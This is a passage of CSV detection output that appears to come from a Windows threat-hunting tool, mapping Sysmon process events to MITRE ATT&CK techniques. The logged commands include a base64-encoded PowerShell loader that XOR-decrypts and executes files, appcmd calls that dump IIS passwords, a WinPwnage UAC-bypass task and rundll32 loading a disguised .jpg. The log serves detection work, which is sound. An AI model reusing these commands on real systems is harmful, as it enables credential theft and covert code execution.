<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-10-23T21:58:17.176847Z"">
</TimeCreated>
<EventRecordID>424081</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""3208"" ThreadID=""4804"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-10-23 21:58:17.171</Data>
<Data Name=""ProcessGuid"">747F3D96-51F9-5F93-0000-001003125E00</Data>
<Data Name=""ProcessId"">7552</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
<Data Name=""CommandLine"">Rundll32.exe shell32.dll,Control_RunDLL C:\PROGRA~3\DATAUS~1.DLL 4624665222</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-4690-5F93-0000-002019A60800</Data>
<Data Name=""LogonId"">0x8a619</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">Medium</Data>
<Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
<Data Name=""ParentProcessGuid"">00000000-0000-0000-0000-000000000000</Data>
<Data Name=""ParentProcessId"">1216</Data>
<Data Name=""ParentImage"">?</Data>
<Data Name=""ParentCommandLine"">?</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1558920559.894473,2019-05-27T05:29:19.894473+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( &quot;C:\Windows\System32\inetsrv\appcmd.exe&quot; list vdir /text:userName ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-27T01:29:19.894473Z"">
</TimeCreated>
<EventRecordID>5970</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""324"" ThreadID=""2260"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-27 01:29:19.834</Data>
<Data Name=""ProcessGuid"">365ABB72-3D6F-5CEB-0000-0010B2D3FF00</Data>
<Data Name=""ProcessId"">3848</Data>
<Data Name=""Image"">C:\Windows\System32\inetsrv\appcmd.exe</Data>
<Data Name=""FileVersion"">7.5.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Application Server Command Line Admin Tool</Data>
<Data Name=""Product"">Internet Information Services</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\System32\inetsrv\appcmd.exe&quot; list vdir /text:userName</Data>
<Data Name=""CurrentDirectory"">C:\Windows\Temp\</Data>
<Data Name=""User"">IIS APPPOOL\DefaultAppPool</Data>
<Data Name=""LogonGuid"">365ABB72-B26B-5CEA-0000-002023240800</Data>
<Data Name=""LogonId"">0x82423</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45</Data>
<Data Name=""ParentProcessGuid"">365ABB72-3D4A-5CEB-0000-0010FA93FD00</Data>
<Data Name=""ParentProcessId"">2584</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe&quot; -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAd
ABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1053] Scheduled Task - Process,1557621150.227012,2019-05-12T04:32:30.227012+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\schtasks.exe ) through command line ( &quot;C:\Windows\System32\schtasks.exe&quot; /create /xml c:\users\ieuser\appdata\local\temp\elevator.xml /tn elevator ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-12T00:32:30.211387Z"">
</TimeCreated>
<EventRecordID>16243</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""1996"" ThreadID=""1832"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-12 00:32:30.023</Data>
<Data Name=""ProcessGuid"">365ABB72-699E-5CD7-0000-001073582200</Data>
<Data Name=""ProcessId"">3876</Data>
<Data Name=""Image"">C:\Windows\System32\schtasks.exe</Data>
<Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Manages scheduled tasks</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\System32\schtasks.exe&quot; /create /xml c:\users\ieuser\appdata\local\temp\elevator.xml /tn elevator</Data>
<Data Name=""CurrentDirectory"">c:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-5DEC-5CD7-0000-00204A380100</Data>
<Data Name=""LogonId"">0x1384a</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8A7E8B05A122B768AB85466B2A3DAF7A358F90F4,MD5=2003E9B15E1C502B146DAD2E383AC1E3,SHA256=15018D0093BEFABBA8B927743191030D1F8C17BB97FDB48C2FC3EAB20E2D4B3D,IMPHASH=D92C80D49382091310FB8DB089F856A9</Data>
<Data Name=""ParentProcessGuid"">365ABB72-6998-5CD7-0000-00104E422200</Data>
<Data Name=""ParentProcessId"">2740</Data>
<Data Name=""ParentImage"">C:\Python27\python.exe</Data>
<Data Name=""ParentCommandLine"">python winpwnage.py -u elevate -i 4 -p c:\Windows\System32\cmd.exe</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1558969958.290374,2019-05-27T19:12:38.290374+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /c whoami /groups ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-27T15:12:38.241298Z"">
</TimeCreated>
<EventRecordID>6168</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""980"" ThreadID=""2220"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-27 15:12:38.231</Data>
<Data Name=""ProcessGuid"">365ABB72-FE66-5CEB-0000-001058F50B00</Data>
<Data Name=""ProcessId"">3256</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">6.1.7601.17514 (win7sp1_rtm.101119-1850)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">cmd.exe /c whoami /groups </Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">365ABB72-7B40-5CEC-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163</Data>
<Data Name=""ParentProcessGuid"">365ABB72-FD85-5CEB-0000-00104C0E0B00</Data>
<Data Name=""ParentProcessId"">1944</Data>
<Data Name=""ParentImage"">C:\Windows\System32\notepad.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\notepad.exe&quot;</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1117] Bypassing Application Whitelisting,1628379191.072445,2021-08-08T03:33:11.072445+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\SysWOW64\rundll32.exe) with commandline ( &quot;C:\Windows\System32\rundll32.exe&quot; c:\users\public\memViewData.jpg,PluginInit)",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2021-08-07T23:33:08.346260Z"">
</TimeCreated>
<EventRecordID>556863</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""3232"" ThreadID=""4176"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2021-08-07 23:33:08.339</Data>
<Data Name=""ProcessGuid"">747F3D96-1834-610F-0000-00105FE5D300</Data>
<Data Name=""ProcessId"">6576</Data>
<Data Name=""Image"">C:\Windows\SysWOW64\rundll32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\System32\rundll32.exe&quot; c:\users\public\memViewData.jpg,PluginInit</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-1231-610F-0000-002057A80700</Data>
<Data Name=""LogonId"">0x7a857</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">Medium</Data>
<Data Name=""Hashes"">SHA1=6778DAD71C8B06264CF2929A5242D2612D3EB026,MD5=2F633406BC9875AA48D6CC5884B70862,SHA256=26E68D4381774A6FD0BF5CA2EACEF55F2AB28536E3176A1C6362DFFC68B22B8A,IMPHASH=BB17B2FBBFF4BBF5EBDCA7D0BB9E4A5B</Data>
<Data Name=""ParentProcessGuid"">747F3D96-182D-610F-0000-00106F40D300</Data>
<Data Name=""ParentProcessId"">9932</Data>
<Data Name=""ParentImage"">C:\Windows\SysWOW64\mshta.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\SysWOW64\mshta.exe&quot; &quot;C:\Users\Public\memViewData.hta&quot; {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} </Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1628379191.072445,2021-08-08T03:33:11.072445+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\SysWOW64\rundll32.exe ) through command line ( &quot;C:\Windows\System32\rundll32.exe&quot; c:\users\public\memViewData.jpg,PluginInit )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2021-08-07T23:33:08.346260Z"">
</TimeCreated>
<EventRecordID>556863</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""3232"" ThreadID=""4176"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2021-08-07 23:33:08.339</Data>
<Data Name=""ProcessGuid"">747F3D96-1834-610F-0000-00105FE5D300</Data>
<Data Name=""ProcessId"">6576</Data>
<Data Name=""Image"">C:\Windows\SysWOW64\rundll32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\System32\rundll32.exe&quot; c:\users\public\memViewData.jpg,PluginInit</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-1231-610F-0000-002057A80700</Data>
<Data Name=""LogonId"">0x7a857</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">Medium</Data>
<Data Name=""Hashes"">SHA1=6778DAD71C8B06264CF2929A5242D2612D3EB026,MD5=2F633406BC9875AA48D6CC5884B70862,SHA256=26E68D4381774A6FD0BF5CA2EACEF55F2AB28536E3176A1C6362DFFC68B22B8A,IMPHASH=BB17B2FBBFF4BBF5EBDCA7D0BB9E4A5B</Data>
<Data Name=""ParentProcessGuid"">747F3D96-182D-610F-0000-00106F40D300</Data>
<Data Name=""ParentProcessId"">9932</Data>
<Data Name=""ParentImage"">C:\Windows\SysWOW64\mshta.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\SysWOW64\mshta.exe&quot; &quot;C:\Users\Public\memViewData.hta&quot; {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} </Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1085] Rundll32 Execution detected,1628379191.072445,2021-08-08T03:33:11.072445+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\SysWOW64\rundll32.exe ) through command line ( &quot;C:\Windows\System32\rundll32.exe&quot; c:\users\public\memViewData.jpg,PluginInit )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2021-08-07T23:33:08.346260Z"">
</TimeCreated>
<EventRecordID>556863</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""3232"" ThreadID=""4176"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2021-08-07 23:33:08.339</Data>
<Data Name=""ProcessGuid"">747F3D96-1834-610F-0000-00105FE5D300</Data>
<Data Name=""ProcessId"">6576</Data>
<Data Name=""Image"">C:\Windows\SysWOW64\rundll32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\System32\rundll32.exe&quot; c:\users\public\memViewData.jpg,PluginInit</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-1231-610F-0000-002057A80700</Data>
<Data Name=""LogonId"">0x7a857</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">Medium</Data>
<Data Name=""Hashes"">SHA1=6778DAD71C8B06264CF2929A5242D2612D3EB026,MD5=2F633406BC9875AA48D6CC5884B70862,SHA256=26E68D4381774A6FD0BF5CA2EACEF55F2AB28536E3176A1C6362DFFC68B22B8A,IMPHASH=BB17B2FBBFF4BBF5EBDCA7D0BB9E4A5B</Data>
<Data Name=""ParentProcessGuid"">747F3D96-182D-610F-0000-00106F40D300</Data>
<Data Name=""ParentProcessId"">9932</Data>
<Data Name=""ParentImage"">C:\Windows\SysWOW64\mshta.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\SysWOW64\mshta.exe&quot; &quot;C:\Users\Public\memViewData.hta&quot; {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} </Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1558920559.784314,2019-05-27T05:29:19.784314+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( &quot;C:\Windows\System32\inetsrv\appcmd.exe&quot; list vdir &quot;Line Number: 0&quot; /text:password ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-27T01:29:19.784314Z"">
</TimeCreated>
<EventRecordID>5967</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""324"" ThreadID=""2260"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-27 01:29:19.714</Data>
<Data Name=""ProcessGuid"">365ABB72-3D6F-5CEB-0000-0010F2CFFF00</Data>
<Data Name=""ProcessId"">3844</Data>
<Data Name=""Image"">C:\Windows\System32\inetsrv\appcmd.exe</Data>
<Data Name=""FileVersion"">7.5.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Application Server Command Line Admin Tool</Data>
<Data Name=""Product"">Internet Information Services</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\System32\inetsrv\appcmd.exe&quot; list vdir &quot;Line Number: 0&quot; /text:password</Data>
<Data Name=""CurrentDirectory"">C:\Windows\Temp\</Data>
<Data Name=""User"">IIS APPPOOL\DefaultAppPool</Data>
<Data Name=""LogonGuid"">365ABB72-B26B-5CEA-0000-002023240800</Data>
<Data Name=""LogonId"">0x82423</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45</Data>
<Data Name=""ParentProcessGuid"">365ABB72-3D4A-5CEB-0000-0010FA93FD00</Data>
<Data Name=""ParentProcessId"">2584</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe&quot; -nop -noni -enc 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</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1053] Scheduled Task - Process,1589239346.761944,2020-05-12T03:22:26.761944+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\svchost.exe ) through command line ( C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-05-11T23:22:26.650196Z"">
</TimeCreated>
<EventRecordID>142033</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2896"" ThreadID=""3548"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-05-11 23:22:26.451</Data>
<Data Name=""ProcessGuid"">747F3D96-DE32-5EB9-0000-00103FC14300</Data>
<Data Name=""ProcessId"">5252</Data>
<Data Name=""Image"">C:\Windows\System32\svchost.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Host Process for Windows Services</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">svchost.exe</Data>
<Data Name=""CommandLine"">C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">747F3D96-5461-5EBA-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">System</Data>
